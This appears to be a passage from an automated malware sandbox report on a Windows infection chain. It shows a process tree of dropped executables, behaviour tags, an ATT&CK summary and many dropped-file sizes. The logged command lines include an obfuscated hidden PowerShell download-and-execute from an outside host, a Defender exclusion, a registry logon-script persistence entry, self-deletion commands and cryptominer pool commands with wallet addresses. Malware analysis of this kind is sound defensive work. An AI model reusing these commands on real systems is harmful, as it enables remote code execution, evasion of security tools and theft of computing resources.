C:\Users\Admin\AppData\Local\Temp\51cldsrmzd1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\51cldsrmzd1\cpyrix.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe" /SpecialRun 4101d8 559211⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 181210⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe"C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-4VI9J.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4VI9J.tmp\vict.tmp" /SL5="$1035E,870426,780800,C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-67ROJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-67ROJ.tmp\win1host.exe" 53510⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\eCUEGYWHo.exe"C:\Users\Admin\AppData\Local\Temp\eCUEGYWHo.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 148811⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe"C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-9VVUA.tmp\muwrgmlshuf.tmp"C:\Users\Admin\AppData\Local\Temp\is-9VVUA.tmp\muwrgmlshuf.tmp" /SL5="$20356,2592217,780800,C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MONLL.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-MONLL.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\TSCfPHLZs.exe"C:\Users\Admin\AppData\Local\Temp\TSCfPHLZs.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe"C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe" /8-238⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe"C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe" /8-239⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe"C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-S9QSD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9QSD.tmp\vpn.tmp" /SL5="$402FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe"C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\razpttoxc42\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617278300 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-HP063.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-HP063.tmp\IBInstaller_97039.tmp" /SL5="$204AA,14574507,721408,C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-MBMQE.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-MBMQE.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe"C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0P19I.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-0P19I.tmp\setups.tmp" /SL5="$6002E,454998,229376,C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\908D.tmp.exe"C:\Users\Admin\AppData\Roaming\908D.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Roaming\9244.tmp.exe"C:\Users\Admin\AppData\Roaming\9244.tmp.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9244.tmp.exe6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 65253D5010569FD42C498B9D33665490 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8AFAF89FF656385098767B37C91C2A252⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
-
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\2f59daff2b0f4631a63ba87b5ad200a4 /t 1696 /p 6841⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b0a044b38e694319902090fb8f9d0e48 /t 2592 /p 28521⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\214b6c722b864289b086f735da210fb9 /t 1404 /p 61121⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{447d59ab-9ce5-0e46-9a70-4f486d259151}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\EAA1.exeC:\Users\Admin\AppData\Local\Temp\EAA1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\EDFD.exeC:\Users\Admin\AppData\Local\Temp\EDFD.exe1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\4E1.exeC:\Users\Admin\AppData\Local\Temp\4E1.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4E1.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\2D5A.exeC:\Users\Admin\AppData\Local\Temp\2D5A.exe1⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 2D5A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2D5A.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 2D5A.exe /f3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\5601.exeC:\Users\Admin\AppData\Local\Temp\5601.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Drops file in Windows directory
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
3Install Root Certificate
1Modify Registry
6Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
280KB
-
Filesize
412KB
-
Filesize
6.9MB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
4KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
172KB
-
Filesize
16KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
44KB
-
Filesize
28KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
4KB
-
Filesize
84.5MB
-
Filesize
84.5MB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
6.9MB
-
Filesize
644KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
608KB
-
Filesize
4KB
-
Filesize
604KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
92KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
84.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
76KB
-
Filesize
1.0MB
-
Filesize
412KB
-
Filesize
344KB
-
Filesize
232KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
52KB
-
Filesize
232KB
-
Filesize
344KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
88KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
288KB
-
Filesize
52KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
17.8MB
-
Filesize
3.5MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
